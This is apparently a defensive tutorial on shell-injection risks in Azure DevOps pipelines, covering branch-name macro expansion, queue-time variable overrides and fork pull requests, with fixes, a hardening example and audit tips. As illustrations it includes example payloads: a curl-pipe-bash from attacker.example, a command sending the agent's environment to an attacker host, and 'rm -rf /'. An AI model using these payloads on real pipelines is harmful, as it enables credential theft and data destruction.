A pull request arrives from a fork. The branch is named main; curl https://attacker.example/exfil.sh | bash; echo. Your pipeline uses $(Build.SourceBranchName) in a script step. The script runs the branch name as shell. The exfiltration runs too.
Azure DevOps YAML expressions were designed to make pipelines flexible. That flexibility is also an attack surface. Macro expansion happens just before task execution — if user-controlled data reaches a script: field via $(varName), an attacker with the ability to submit a PR or set a queue-time variable can execute arbitrary code in the pipeline agent’s context. The agent has access to service connections, deployment credentials, and artifact feeds. A compromised agent is a compromised delivery chain.
This article gives you the practical tools to:
- Identify which expression types create injection surface and which do not.
- Understand the three primary injection vectors: macro expansion, queue-time variables, and fork PR metadata.
- Apply the env: block pattern to eliminate the most common injection class.
- Use typed parameters with values: constraints to reject invalid input at parse time.
- Enforce organization-wide security baselines using extends templates and pipeline decorators.
We cover the threat model, the three injection vectors, four defensive patterns ordered by strength, and a hardening checklist you can apply to any pipeline in an afternoon.
The Threat Model
What Attackers Can Control
Three actor types can introduce malicious data into a pipeline without modifying the pipeline YAML directly.
PR submitters — any authenticated user who can open a pull request — control the branch name, commit message, PR title, PR description, and (when the PR comes from a fork) the YAML file content itself. None of these values are sanitized by Azure DevOps before they are made available as pipeline variables.
Queue-time variable setters — users with the “Queue builds” permission — can override any pipeline variable that is not explicitly locked. They do this through the “Run pipeline” UI or the Azure DevOps REST API. The variable value they supply is treated identically to the value defined in the YAML file.
Authenticated pipeline triggerers — users with “Queue builds” permission — can supply parameter values at trigger time. Any string parameter without a values: constraint accepts arbitrary input.
| Actor | What They Control | Injection Surface | Required Permission |
|---|---|---|---|
| PR Submitter | Branch name, commit message, PR title, PR description, YAML (from fork) | $(Build.SourceBranchName), $(Build.SourceVersionMessage), $(System.PullRequest.SourceBranch) | Contributor or fork author |
| Queue-Time Variable Setter | Any pipeline variable not marked readonly: true | Any $(varName) used in scripts when varName is a YAML-defined variable | Queue builds |
| Authenticated Triggerer | Pipeline parameters at trigger time | Any unconstrained string parameter used in scripts via ${{ parameters.param }} | Queue builds |
An attacker does not need to modify the pipeline YAML to exploit injection. They only need to control a value that reaches an unsafe expression context.
What Happens When Injection Succeeds
A successful pipeline injection runs attacker-controlled code in the agent’s security context. The agent process has access to every credential the pipeline has been granted:
- The repository checkout token (read access to the source repo and other repos in the org, depending on scope settings)
- Service connection credentials loaded as environment variables or mounted as Azure CLI sessions
- Secrets from variable groups injected at job initialization
- Any files on the agent’s local disk written by previous pipeline steps
The attack sequence after a successful injection: exfiltrate the service connection credentials via an outbound HTTP request, use those credentials to push a malicious build artifact to the container registry, or trigger a deployment to a protected environment before the pipeline run is even flagged as suspicious.
Artifact poisoning is particularly dangerous because it is persistent. A compromised container image pushed to a shared registry contaminates every downstream service that pulls from it — the blast radius extends far beyond the single pipeline run.
Expression Types and Their Injection Risk
The three Azure DevOps expression syntaxes have different risk profiles:
| Expression Type | Evaluation Phase | Injection Risk | Risk Condition |
|---|---|---|---|
| $(varName) macro expansion | Runtime, before task starts | High | Value substituted as raw string into command; shell metacharacters execute |
| ${{ expression }} compile-time | Parse time | Medium | Unconstrained string parameters used inline in script: fields are injectable |
| $[ expression ] runtime | Runtime, in condition fields | Low (conditional) | Safe in condition: fields; risk reapplies if result is mapped to a variable used in a script |
Macro expansion is the highest-risk type because it is a literal string substitution that occurs after the YAML is loaded but before the shell receives the command. The shell sees the macro-expanded string as the command to execute. Shell metacharacters (;, |, &&, backticks, $()) in the substituted value are interpreted by the shell — not treated as data.
Compile-time expressions are medium-risk because parameters can carry typed constraints. A string parameter with a values: list rejects invalid values at parse time. Without that constraint, ${{ parameters.userInput }} inline in a script: field is as injectable as macro expansion.
Injection Vector 1 — Macro Expansion in Scripts
The Classic Branch Name Injection
$(Build.SourceBranchName) is a predefined variable populated from the Git ref name. Azure DevOps does not sanitize it. A branch named main; curl https://attacker.example/exfil.sh | bash; echo is a valid Git branch name.
The vulnerable pipeline:
```yaml
# VULNERABLE: macro substitutes branch name directly into the command string
steps:
- script: |
    echo "Building branch $(Build.SourceBranchName)"
    docker build -t myapp:$(Build.SourceBranchName) .
  displayName: 'Build image'
```
When the pipeline runs against that branch, the shell receives:
```shell
echo "Building branch main; curl https://attacker.example/exfil.sh | bash; echo"
docker build -t myapp:main; curl https://attacker.example/exfil.sh | bash; echo .
```
In the first line the payload sits inside double quotes and merely prints; in the second, the semicolon terminates the docker build command. The curl | bash then runs as a separate command with the agent’s full credential access, and the trailing echo swallows the leftover build-context argument (.) so the line stays syntactically valid and the log looks clean.
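The substitution-versus-environment distinction can be reproduced outside Azure DevOps. This Python sketch (illustrative; the branch value and image name are made up) runs the same echo through the shell both ways: interpolated into the command string like a macro, and passed as an environment variable like the env: block pattern:

```python
import subprocess

branch = "main; echo INJECTED"  # attacker-controlled branch name

# Macro-style: the value is spliced into the command string BEFORE the
# shell parses it, so the semicolon becomes a command separator.
unsafe = subprocess.run(
    f"echo tag=myapp:{branch}", shell=True, capture_output=True, text=True
)

# env-block style: the command string is a constant; the shell expands
# $BRANCH after parsing, so the value stays a single piece of data.
safe = subprocess.run(
    'echo "tag=myapp:$BRANCH"', shell=True, capture_output=True, text=True,
    env={"BRANCH": branch},
)

print(unsafe.stdout.splitlines())  # ['tag=myapp:main', 'INJECTED'] -> injected command ran
print(safe.stdout.strip())         # tag=myapp:main; echo INJECTED  -> inert data
```

The unsafe run prints INJECTED on its own line because the shell executed the payload; the safe run prints the entire branch name as data.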
Diagram: YAML Injection vs. env: Block Mitigation
This diagram visualizes how a malicious branch name is expanded into a command string, causing a shell injection, and how the env: block pattern prevents it by treating the data as inert.
Visual Notes:
- Unsafe Flow: The malicious input becomes part of the command structure during substitution. The shell interprets the semicolon as a command terminator and executes the rest.
- Safe Flow: The malicious input is passed as process data. The shell treats it as a single string, and metacharacters like ; or | lose their special meaning.
This class of vulnerability applies to any predefined variable sourced from attacker-controlled Git metadata. The mechanism is identical for commit messages and PR fields.
The Fix — The env: Block Pattern
Assign the macro-expanded value to an environment variable in the step’s env: block. Reference the environment variable inside the script using the shell’s native variable syntax.
```yaml
# SECURE: branch name passed as process environment variable — metacharacters are inert
steps:
- script: |
    echo "Building branch $BRANCH_NAME"
    docker build -t "myapp:$BRANCH_NAME" .
  displayName: 'Build image'
  env:
    BRANCH_NAME: $(Build.SourceBranchName)
```
The OS passes environment variables to the child process through a separate channel from the command string. The shell expands $BRANCH_NAME after the command is already parsed. By the time the shell sees the value, the command structure is fixed — the semicolons, pipes, and backticks in the value are data inside a string, not shell syntax.
With the env: block pattern:
- The command string is a compile-time constant that contains no user-controlled content
- The attacker-controlled value arrives at the script as process data, not as part of the command
- The double-quoting ("myapp:$BRANCH_NAME") prevents word splitting and glob expansion, covering the case where the branch name contains spaces
In PowerShell steps, reference the variable as $env:BRANCH_NAME:
```yaml
steps:
- pwsh: |
    Write-Host "Building branch $env:BRANCH_NAME"
    docker build -t "myapp:$env:BRANCH_NAME" .
  displayName: 'Build image (PowerShell)'
  env:
    BRANCH_NAME: $(Build.SourceBranchName)
```
High-Risk Predefined Variables
Every predefined variable sourced from Git metadata or user-submitted PR data is a potential injection vector. Treat all of them as untrusted input:
| Variable | Source | Risk |
|---|---|---|
| $(Build.SourceBranchName) | Git ref name | High — branch names allow shell metacharacters |
| $(Build.SourceBranch) | Full ref path (refs/heads/…) | High — same source, more characters |
| $(Build.SourceVersionMessage) | Git commit message | High — developers legitimately use `, ", ; in commit messages |
| $(System.PullRequest.SourceBranch) | PR source branch | High |
| $(System.PullRequest.Title) | PR title (user input) | High |
| $(Build.RequestedFor) | Triggering user’s display name | Medium — display names can contain special chars |
| $(Build.Repository.Name) | Repository name | Medium — org-controlled but validate on cross-org triggers |
Apply the env: block pattern to every script step that uses any of these variables. There is no safe way to use them directly in a command string.
Injection Vector 2 — Queue-Time Variable Overrides
How Queue-Time Overrides Work
Any pipeline variable defined in the YAML variables: block can be overridden at queue time by a user with “Queue builds” permission — they supply a custom value in the “Run pipeline” dialog or through the REST API (POST /build/builds). The override applies to every use of $(varName) in the pipeline run.
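To make the override concrete, the sketch below builds the request body for the queue-build endpoint (POST …/_apis/build/builds). The field names follow the commonly documented shape of that API, in which queue-time variables travel as a JSON-encoded string under "parameters"; treat the exact endpoint, version, and field names as assumptions to verify against your instance, and the definition id and override values as placeholders.

```python
import json

def queue_build_body(definition_id: int, overrides: dict) -> str:
    """Build the JSON body for POST {org}/{project}/_apis/build/builds.

    Assumption: queue-time variable overrides are sent as a JSON-encoded
    *string* under "parameters" (classic Builds API shape); verify
    against your Azure DevOps instance before relying on it.
    """
    return json.dumps({
        "definition": {"id": definition_id},
        "parameters": json.dumps(overrides),
    })

# A malicious override: exactly what readonly: true is meant to block.
body = queue_build_body(42, {"deployTarget": "kubernetes.attacker.internal"})
print(body)
```

Any caller with "Queue builds" permission and a personal access token can send such a body; the pipeline treats the supplied value identically to the YAML-defined one.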
The vulnerable pattern:
```yaml
# VULNERABLE: deployTarget can be overridden to any value at queue time
variables:
- name: deployTarget
  value: kubernetes.prod.internal

steps:
- script: kubectl config use-context $(deployTarget)
  displayName: 'Set deployment context'
- script: kubectl apply -f manifests/ --context=$(deployTarget)
  displayName: 'Apply manifests'
```
A user with “Queue builds” permission triggers the pipeline with deployTarget set to kubernetes.attacker.internal — or with kubernetes.prod.internal; cat /proc/1/environ | base64 | curl -d @- https://attacker.example/dump — and the pipeline deploys to the wrong cluster or exfiltrates the agent’s environment.
readonly: true — Locking Variables
Add readonly: true to any variable declaration that should not be overridden at queue time or modified by ##vso[task.setvariable] logging commands inside a running job:
```yaml
variables:
- name: deployTarget
  value: kubernetes.prod.internal
  readonly: true   # queue-time override rejected; ##vso[task.setvariable] blocked
- name: containerRegistry
  value: myregistry.azurecr.io
  readonly: true
- name: buildId
  value: $(Build.BuildId)
  readonly: true
```
When a user attempts to override a readonly: true variable in the “Run pipeline” UI, the field is grayed out. When a running script attempts to override it via ##vso[task.setvariable variable=deployTarget]kubernetes.attacker.internal, the agent logs:
VariableName is read-only and can't be changed.
Mark as readonly: true any variable that influences the deployment target, the environment name, the service connection selector, the artifact feed URL, or any other security-relevant path.
Limitation: readonly: true applies only to variables defined in the YAML variables: block. It does not affect variables defined in the Azure DevOps UI (pipeline variables tab) or variables supplied by variable groups. Furthermore, if a - group: appears after a YAML variable definition of the same name, the group’s value overwrites the YAML value and the readonly status may be lost. Restrict variable group access in the Library security settings.
Typed Parameters as a Stronger Gate
readonly: true locks a specific value. A typed parameter with a values: constraint enforces an allowlist — only values in the approved list are accepted, and the check happens at parse time before any agent is allocated:
```yaml
# SECURE: deployEnvironment is validated against an allowlist at parse time
parameters:
- name: deployEnvironment
  type: string
  values:
  - dev
  - staging
  - prod

steps:
- bash: kubectl config use-context "$DEPLOY_ENV"
  displayName: 'Set deployment context'
  env:
    DEPLOY_ENV: ${{ parameters.deployEnvironment }}
```
If a caller passes prod; rm -rf /, Azure DevOps rejects the run at parse time:
/azure-pipelines.yml (Line: 4, Col: 7): 'prod; rm -rf /' is not a valid value for 'deployEnvironment'. Valid values: dev, staging, prod.
No agent starts. No credentials are loaded. The rejection is instantaneous.
Typed parameters are stronger than readonly: true for two reasons: they enforce an allowlist (not just immutability), and they block invalid values even when the parameter comes from another template’s parameter pass-through.
Use type: boolean for feature-flag parameters — no value other than true or false is accepted, making injection through a boolean parameter impossible by construction.
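A minimal sketch of the boolean pattern (the parameter and script names are illustrative):

```yaml
parameters:
- name: runSmokeTests
  type: boolean
  default: false

steps:
- ${{ if eq(parameters.runSmokeTests, true) }}:
  - script: ./run-smoke-tests.sh
    displayName: 'Smoke tests'
```

The parameter can only ever be true or false, so there is no string for an attacker to smuggle metacharacters into.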
When to use which control:
| Situation | Control |
|---|---|
| Existing YAML variable that should not be overridden | readonly: true |
| New parameter that selects from a fixed set (environment, registry) | Typed parameter with values: |
| Value must be user-controlled but safe to pass to a script | env: block pattern |
| Production-influencing value that should never be user-controlled | readonly: true + env: block |
Injection Vector 3 — Fork PR Pipelines
The Fork Threat Surface
When a pipeline is triggered by a PR from a fork repository, the fork controls the branch. If the pipeline loads YAML from the PR branch (the default for PR-triggered pipelines), the fork author can modify the pipeline YAML itself — not just the variable values. This elevates the threat from data injection to full pipeline compromise.
By default, Azure DevOps runs fork PR pipelines with a restricted token and without access to protected resources (environments, service connections, variable groups, agent pools, and secure files marked as protected). This is the “safe fork” configuration. If the “safe fork” settings are relaxed, or if the pipeline uses non-protected resources, a fork PR pipeline has the same credential access as a mainline pipeline run.
Protected Resources
Mark service connections, variable groups, agent pools, environments, and secure files as “protected” — protected resources require an approval before a pipeline that does not come from an authorized branch can use them.
To mark a service connection as protected:
- Navigate to Project Settings → Service Connections
- Open the service connection → Security
- Set “Grant access permission to all pipelines” to Off (restrict access)
- Set “Protected resource” to On
When a fork PR pipeline requests a protected service connection, a pipeline reviewer sees an approval prompt before the job starts. The fork author cannot proceed past that gate without human review.
All service connections that access production systems should be protected resources:
| Resource Type | Protect These | Leave Unprotected |
|---|---|---|
| Service connections | Production registries, production environments, key vaults, prod subscriptions | Dev/test Azure subscriptions with no sensitive data |
| Variable groups | Any group containing secrets or production configuration | Non-sensitive build configuration |
| Environments | Production, staging-with-approvals | Dev environments with no real credentials |
| Agent pools | Self-hosted pools with production network access | Microsoft-hosted pools |
YAML from Protected Branches
Configure the pipeline to load YAML from a protected branch rather than from the PR branch. When YAML comes from the protected branch, the fork author can only modify application code — the pipeline logic itself stays under the control of the protected branch owners.
To configure this in Azure DevOps:
- Navigate to the pipeline → Edit → … (three dots) → Triggers
- Under Pull request validation, enable “Require a team member’s comment before building a pull request” for forks
- Under the branch policy for the protected branch (Repos → Branches → Branch policies), add a Build Validation rule and set “Path filter” to include azure-pipelines.yml — this ensures pipeline YAML changes require code review
This setting does not prevent all injection — branch names and PR metadata are still attacker-controlled — but it eliminates the class of attacks where the fork modifies the pipeline definition to bypass security controls entirely.
Defensive Patterns — From Component to Organization
Compile-Time Parameter Validation with ${{ if }}
A values: constraint on a parameter is the primary gate. A compile-time ${{ if }} validation block provides defense-in-depth for templates that receive parameters from other templates, where the outer caller’s values: constraint may not apply:
```yaml
# deploy-steps.yml — two-gate validation: values constraint + compile-time check
parameters:
- name: environment
  type: string
  values:        # gate 1: parse-time allowlist (applies when called directly)
  - dev
  - staging
  - prod

steps:
# Gate 2: compile-time validation (applies even when called from another template)
- ${{ if not(in(parameters.environment, 'dev', 'staging', 'prod')) }}:
  - script: exit 1
    displayName: "SECURITY: Invalid environment '${{ parameters.environment }}' rejected"
- bash: kubectl config use-context "$DEPLOY_ENV"
  displayName: 'Set deployment context'
  env:
    DEPLOY_ENV: ${{ parameters.environment }}
```
The in() function checks the value against an explicit list. If the value is not in the list, the validation step is injected and the pipeline fails immediately with a display name that includes the rejected value — making the audit trail clear.
Log the invalid value in the failing step’s display name rather than in the script body. Display names appear in the pipeline timeline without requiring the step to execute, so auditors can see the rejected value even if the step is never reached.
extends Templates for Organization-Wide Baselines
An extends template wraps the entire pipeline. Any pipeline that declares extends: template: security/baseline.yml@templates runs all of its stages inside the baseline’s control. The baseline can enforce mandatory pre-steps, post-steps, and step type restrictions.
The pipeline file:
```yaml
# azure-pipelines.yml — all stages must extend the security baseline
extends:
  template: security/baseline.yml@templates
  parameters:
    stages:
    - stage: Build
      displayName: 'Build and Test'
      jobs:
      - job: BuildApp
        pool:
          vmImage: ubuntu-latest
        steps:
        - script: dotnet build --configuration Release
          displayName: 'Build'
        - script: dotnet test --no-build
          displayName: 'Test'
```
The baseline template:
```yaml
# security/baseline.yml — mandatory security envelope
parameters:
- name: stages
  type: stageList
  default: []

stages:
# Pre-stage: runs before any caller stages
- stage: SecurityScan
  displayName: 'Security Pre-Scan'
  jobs:
  - job: CredentialScan
    pool:
      vmImage: ubuntu-latest
    steps:
    - task: MicrosoftSecurityDevOps@1
      displayName: 'Scan for secrets and vulnerabilities'
      inputs:
        categories: 'secrets,code'

# Caller stages: injected between pre and post
- ${{ each stage in parameters.stages }}:
  - ${{ stage }}

# Post-stage: always runs, even if a caller stage fails (condition: always())
- stage: AuditLog
  displayName: 'Audit Log'
  condition: always()
  jobs:
  - job: WriteAuditEntry
    pool:
      vmImage: ubuntu-latest
    steps:
    - bash: |
        echo "Pipeline: $(Build.DefinitionName)"
        echo "Build ID: $(Build.BuildId)"
        echo "Triggered by: $REQUESTED_BY"
        echo "Branch: $BRANCH_NAME"
        echo "Result: $(Agent.JobStatus)"
      displayName: 'Write audit entry'
      env:
        BRANCH_NAME: $(Build.SourceBranchName)
        REQUESTED_BY: $(Build.RequestedFor)   # user-controlled display name; pass via env
```
To make the baseline mandatory, add a “Required pipeline template” policy in Azure DevOps:
- Project Settings → Pipelines → Settings
- Enable “Require pipeline YAML to extend an approved template”
- Add security/baseline.yml@templates as the required template
Once enforced, any pipeline that does not extend the baseline is rejected before it can run. Pipeline authors cannot bypass the security scan by omitting the extends: declaration.
Pipeline Decorators for Non-Bypassable Injection
Pipeline decorators inject steps into every pipeline run in the organization. Unlike extends templates, which require the pipeline author to declare extends:, decorators apply automatically — pipeline authors cannot opt out by modifying their pipeline YAML.
A decorator is authored as an Azure DevOps extension. It defines pre-job and post-job steps that the agent injects around every job, regardless of the pipeline’s content:
```yaml
# decorator manifest (vss-extension.json contribution target)
# This YAML is injected before every job in the organization
steps:
- task: MicrosoftSecurityDevOps@1
  displayName: '[Decorator] Secret scan'
  condition: always()
  inputs:
    categories: 'secrets'
- bash: |
    echo "Job started: $(Build.BuildId) / $(System.JobName)"
    echo "Repository: $REPO_NAME"
    echo "Agent: $(Agent.Name)"
  displayName: '[Decorator] Audit: job start'
  condition: always()
  env:
    REPO_NAME: $(Build.Repository.Name)   # org-controlled, but treated as untrusted
```
Decorators run with higher trust than pipeline YAML. They cannot be removed or disabled from within the pipeline. Use them to inject credential scanning, runtime anomaly detection, and mandatory audit logging that applies to every pipeline in the organization without requiring any pipeline author action.
The trade-off: decorators add execution time to every job. A 30-second credential scan adds 30 seconds to every pipeline run across the organization. Minimize decorator overhead by running scans in parallel with early job steps where possible, and scope decorators to specific agent pools if not all pipelines need the same controls.
Hands-On Example: Hardening a PR-Triggered Build Pipeline
Scenario: A security engineer audits a PR-triggered build pipeline that builds a .NET application and pushes a container image to a private registry. The audit finds three vulnerabilities: (1) $(Build.SourceBranchName) used directly in a shell script for image tagging; (2) the containerRegistry variable is overridable at queue time; (3) the pipeline runs on fork PRs with access to the container registry service connection. All three need remediation without breaking the pipeline’s functionality.
Before — the vulnerable pipeline:
```yaml
# azure-pipelines.yml — BEFORE: three injection vulnerabilities
trigger:
- main

pr:
- main

variables:
- name: containerRegistry
  value: myregistry.azurecr.io   # overridable at queue time
- name: imageName
  value: myapp

stages:
- stage: Build
  jobs:
  - job: BuildAndPush
    pool:
      vmImage: ubuntu-latest
    steps:
    - task: Docker@2
      displayName: 'Build image'
      inputs:
        containerRegistry: sc-myregistry   # not a protected resource
        repository: $(imageName)
        command: build
        # VULNERABILITY 1: branch name macro directly in a Dockerfile arg
        arguments: '--build-arg BRANCH=$(Build.SourceBranchName)'
        tags: $(Build.BuildId)
    # VULNERABILITY 2: containerRegistry variable used in script (overridable)
    - script: |
        echo "Pushing to $(containerRegistry)/$(imageName):$(Build.SourceBranchName)"
        docker push $(containerRegistry)/$(imageName):$(Build.SourceBranchName)
      displayName: 'Push image'
    - script: |
        echo "Branch: $(Build.SourceBranchName)"
        git tag -a "build-$(Build.SourceBranchName)" -m "CI build"
        git push origin "build-$(Build.SourceBranchName)"
      displayName: 'Tag commit'
```
After — all three vulnerabilities remediated:
```yaml
# azure-pipelines.yml — AFTER: all three vectors closed
trigger:
- main

pr:
  branches:
    include:
    - main
# Require a comment from a team member before building fork PRs
# (configured in branch policy, not YAML — noted here for documentation)

variables:
- name: containerRegistry
  value: myregistry.azurecr.io
  readonly: true   # FIX 2: cannot be overridden at queue time
- name: imageName
  value: myapp
  readonly: true

stages:
- stage: Build
  jobs:
  - job: BuildAndPush
    pool:
      vmImage: ubuntu-latest
    steps:
    # FIX 3: sc-myregistry is now a protected resource;
    # fork PR pipelines trigger an approval prompt before this task runs
    - task: Docker@2
      displayName: 'Login to ACR'
      inputs:
        command: login
        containerRegistry: sc-myregistry
    # FIX 1a: task replaced with bash script; branch name moved to env block.
    # The Dockerfile receives it securely via --build-arg
    - bash: |
        docker build -t "$REGISTRY/$IMAGE_NAME:$(Build.BuildId)" \
          --build-arg BRANCH="$BRANCH_NAME" .
      displayName: 'Build image (Secure)'
      env:
        REGISTRY: $(containerRegistry)
        IMAGE_NAME: $(imageName)
        BRANCH_NAME: $(Build.SourceBranchName)   # safe: passed as process data
    # FIX 1b: branch name consumed via environment variable in all scripts
    - bash: |
        echo "Pushing to $REGISTRY/$IMAGE_NAME:$(Build.BuildId)"
        docker push "$REGISTRY/$IMAGE_NAME:$(Build.BuildId)"
      displayName: 'Push image'
      env:
        REGISTRY: $(containerRegistry)   # readonly var; safe to expand here
        IMAGE_NAME: $(imageName)
    - bash: |
        echo "Branch: $BRANCH_NAME"
        # The shell substitution ${BRANCH_NAME//[^a-zA-Z0-9._-]/-} replaces
        # any character that is not alphanumeric, dot, underscore, or hyphen
        # with a hyphen — producing a safe git tag even with a crafted branch name
        SAFE_BRANCH="${BRANCH_NAME//[^a-zA-Z0-9._-]/-}"
        git tag -a "build-$SAFE_BRANCH" -m "CI build"
        git push origin "build-$SAFE_BRANCH"
      displayName: 'Tag commit'
      env:
        BRANCH_NAME: $(Build.SourceBranchName)
```
Remediation Steps:
- Fix Vector 1 (macro injection): Move all $(Build.SourceBranchName) references from script bodies and task arguments into env: blocks as BRANCH_NAME: $(Build.SourceBranchName). Update all scripts to reference $BRANCH_NAME (Bash) or $env:BRANCH_NAME (PowerShell). Convert the Docker@2 build task to a bash: script because Docker@2 does not natively expand env: blocks into its arguments: field.
- Fix Vector 2 (queue-time override): Add readonly: true to the containerRegistry and imageName variable declarations. Alternatively, replace them with typed string parameters whose values: constraints list approved registries.
- Fix Vector 3 (fork PR access): In Project Settings → Service Connections → sc-myregistry → Security, enable “Protected resource.” Verify that fork PR pipelines trigger an approval prompt before the Docker login task runs.
- Add defense-in-depth: Add a compile-time validation block for any string parameters used in script arguments. Sanitize the branch name in the git tag step using a shell substitution that enforces safe characters. Use explicit bash: step types so shell substitutions work consistently regardless of agent OS.
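The shell substitution in the tag step can be sanity-checked off-pipeline. This Python sketch mirrors the bash pattern ${BRANCH_NAME//[^a-zA-Z0-9._-]/-} (the helper name is illustrative):

```python
import re

def safe_git_tag_component(branch: str) -> str:
    """Mirror of the bash substitution ${BRANCH_NAME//[^a-zA-Z0-9._-]/-}:
    every character outside [A-Za-z0-9._-] becomes a hyphen."""
    return re.sub(r"[^A-Za-z0-9._-]", "-", branch)

print(safe_git_tag_component("test; echo INJECTED > /tmp/pwned"))
# test--echo-INJECTED----tmp-pwned
```

The crafted branch name survives only as inert hyphen-separated text, so the resulting git tag carries no shell syntax.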
Verify remediation:
- Create a local branch named test; echo INJECTED > /tmp/pwned and push it. Confirm the pipeline log shows the literal branch name in the output, not the word INJECTED, and that no /tmp/pwned file is created.
- Attempt to override containerRegistry at queue time. Confirm the field is grayed out in the “Run pipeline” dialog.
- Submit a PR from a fork. Confirm the pipeline shows an approval prompt before the Docker task executes.
Best Practices
Do:
- Apply the env: block pattern to every script step that needs a user-controlled or Git-sourced value — it is the single most impactful security change for most pipelines.
- Mark all service connections that access production systems as protected resources.
- Use typed parameters with values: allowlists for environment selectors.
- Load pipeline YAML from a protected branch for PR-triggered pipelines to prevent fork authors from modifying the pipeline logic.
- Audit variables: blocks for any variable used in a script: field and add readonly: true to those that should not be overridden at queue time.
- Pass $(System.AccessToken) via the env: block as SYSTEM_TOKEN: $(System.AccessToken) — never expand it inline in a script command where it could be echoed to logs.
Don’t:
- Enable “Make secrets available to builds from forks” unless the pipeline runs in a completely isolated agent pool with no access to production systems.
- Rely on secret masking as your only security control — secrets are masked in Azure DevOps logs, but a compromised agent can exfiltrate them through outbound network calls, file writes, or side-channels that bypass the log output.
- Use unconstrained string parameters in script: fields via ${{ parameters.myParam }} inline in the command — compile-time parameters without values: constraints are injectable if a caller can supply arbitrary input.
- Trust $(Build.Repository.Name) or $(Build.RequestedFor) as safe inputs — they are org-controlled for internal repos, but validate them the same way as any external input.
Audit and detection:
Run this query against your pipeline YAML files to find the most common injection patterns:
```shell
# Find macro expansion of user-controlled variables in script fields
grep -rn '\$(Build\.Source\|System\.PullRequest\|Build\.Requested' \
  --include="*.yml" ./ | grep -v 'env:'
```
Every match where the variable is not inside an env: block is a candidate for remediation.
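For a slightly smarter first pass than grep piping, the sketch below flags risky macros that appear outside an env: mapping. It uses an indentation heuristic rather than a full YAML parser, and the function name and sample are illustrative:

```python
import re

MACRO = re.compile(r"\$\((Build\.Source|System\.PullRequest|Build\.Requested)")

def audit(yaml_text):
    """Flag (line_number, line) pairs that expand a risky macro outside
    an env: block. Heuristic: lines indented deeper than the most recent
    env: key are treated as inside its mapping."""
    findings, env_indent = [], None
    for n, line in enumerate(yaml_text.splitlines(), 1):
        indent = len(line) - len(line.lstrip())
        if env_indent is not None and (not line.strip() or indent <= env_indent):
            env_indent = None                  # left the env: block
        if line.strip() == "env:":
            env_indent = indent                # entering an env: block
            continue
        if env_indent is None and MACRO.search(line):
            findings.append((n, line.strip()))
    return findings

sample = """\
steps:
- script: |
    echo "Building $(Build.SourceBranchName)"
  displayName: Build
- script: echo "$BRANCH"
  env:
    BRANCH: $(Build.SourceBranchName)
"""
print(audit(sample))  # [(3, 'echo "Building $(Build.SourceBranchName)"')]
```

The macro inside the env: block is correctly skipped; only the inline expansion on line 3 is reported for remediation.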
Use Azure DevOps audit logs (Organization Settings → Auditing) to monitor:
- Service connection access events — which pipelines accessed which connections and when.
- Pipeline variable override events — queue-time overrides attempted or applied.
- Protected resource approval events — who approved and who requested.
Compliance:
The extends template enforcement combined with protected resources satisfies the “pipeline-as-code with mandatory review” control in SOC 2 Type II and ISO 27001 change management domains. The values: allowlists for environment-selecting parameters function as the access control list for deployment targets — document them as part of the change management record.
Troubleshooting Common Issues
Issue 1: The env: block fix broke a script that constructed a command from the variable
Cause: The script used the variable value as part of the command string directly — for example, docker tag myimage:$(Build.BuildId) where the build ID was expected to be part of the command. Moving to env: requires the script to read the environment variable and construct the command inside the script body.
Solution:
```yaml
# BEFORE (vulnerable):
- script: docker tag myimage:$(Build.BuildId) myimage:latest

# AFTER (safe): construct the tag inside the script body
- bash: docker tag "myimage:$BUILD_ID" myimage:latest
  env:
    BUILD_ID: $(Build.BuildId)
```
Issue 2: readonly: true on a YAML variable is still being overridden by a variable group
Cause: readonly: true prevents queue-time UI overrides and ##vso[task.setvariable] logging commands from changing the variable. It does not block a variable group linked to the pipeline from supplying a value for the same variable name. Variable group values are applied before readonly is evaluated.
Solution: Remove the variable from the variable group, or rename the variable group’s version. Control variable group access through the group’s permissions settings (Pipelines → Library → variable group → Security) — restrict which pipelines can link to the group.
Issue 3: Fork PR pipelines still access the protected service connection without an approval prompt
Cause: The pipeline was run before the “protected resource” setting was saved, or the service connection was not saved after the protection flag was applied. Azure DevOps caches pipeline resource authorization — an existing run may not pick up the new protection flag.
Solution: Re-open Project Settings → Service Connections → Security, confirm the protected resource toggle is enabled, and save. Trigger a completely new run (not a retry of an existing run) from a fork PR. The approval prompt appears for new runs only.
Issue 4: A values: constraint blocks a legitimate automation script that sets a non-standard environment name
Cause: The automation script passes a dynamically computed environment string that does not match the allowlist. The values: constraint correctly rejects it — but the automation is a legitimate use case.
Solution: Add the automation’s environment values to the values: list. If the automation needs fully arbitrary values, create a separate parameter without a values: constraint and route it through a dedicated pipeline that has more restricted trigger settings (e.g., restricted to specific service accounts, not available to PR triggers).
Issue 5: A pipeline decorator is injecting into pipelines it should not affect
Cause: Pipeline decorators apply to every pipeline run in the organization by default. The decorator manifest has no built-in scope restriction per project or per agent pool.
Solution: Add a condition in the injected step that checks $(System.TeamProject) or $(Build.Repository.Name) and exits early for out-of-scope pipelines:
```yaml
# Decorator step with early-exit condition for out-of-scope projects
steps:
- bash: |
    if [ "$TEAM_PROJECT" != "Production" ] && [ "$TEAM_PROJECT" != "Platform" ]; then
      echo "Decorator: not applicable to project $TEAM_PROJECT — skipping"
      exit 0
    fi
    # Run the actual scan
    ./security-scan.sh
  displayName: '[Decorator] Security scan'
  condition: always()
  env:
    TEAM_PROJECT: $(System.TeamProject)
```
Alternatively, use the target: configuration in the decorator’s vss-extension.json to restrict injection to specific pipeline definitions by ID.
Key Takeaways
- The primary injection vector is macro expansion: $(varName) substitutes the value as a raw string into the command before shell parsing. Moving any user-controlled or Git-sourced value from the command string into the env: block eliminates this injection class entirely.
- Queue-time variable overrides are an injection vector for any variable used in a script. Lock production-influencing variables with readonly: true, and replace unconstrained string inputs with typed parameters that have values: allowlists.
- Fork PR pipelines are the highest-risk trigger context. Mark all service connections for production resources as protected, and configure the pipeline to load YAML from a protected branch — never from the fork.
- extends templates are the strongest pipeline-level control: they make a security baseline mandatory and unskippable for all pipelines that use them. Combined with a “Required pipeline template” policy, no pipeline in the organization can run without the baseline.
- Secret masking is not a security control. Secrets masked in logs are still present in environment memory and accessible to any code running in the agent process. The real control is restricting which pipelines can access secrets via protected resources and mandatory approval gates.
Next steps:
- Grep all script: and bash: steps for $(Build.Source, $(System.PullRequest, and $(Build.RequestedFor — every match outside an env: block is a candidate for the env: block fix described above.
- Mark your three highest-privilege service connections (production registry, production environment, key vault) as protected resources — this single change prevents the most damaging fork PR attacks.
- Review the variables: block in every pipeline that runs on PR triggers and add readonly: true to any variable that selects a deployment target, registry, or environment name.
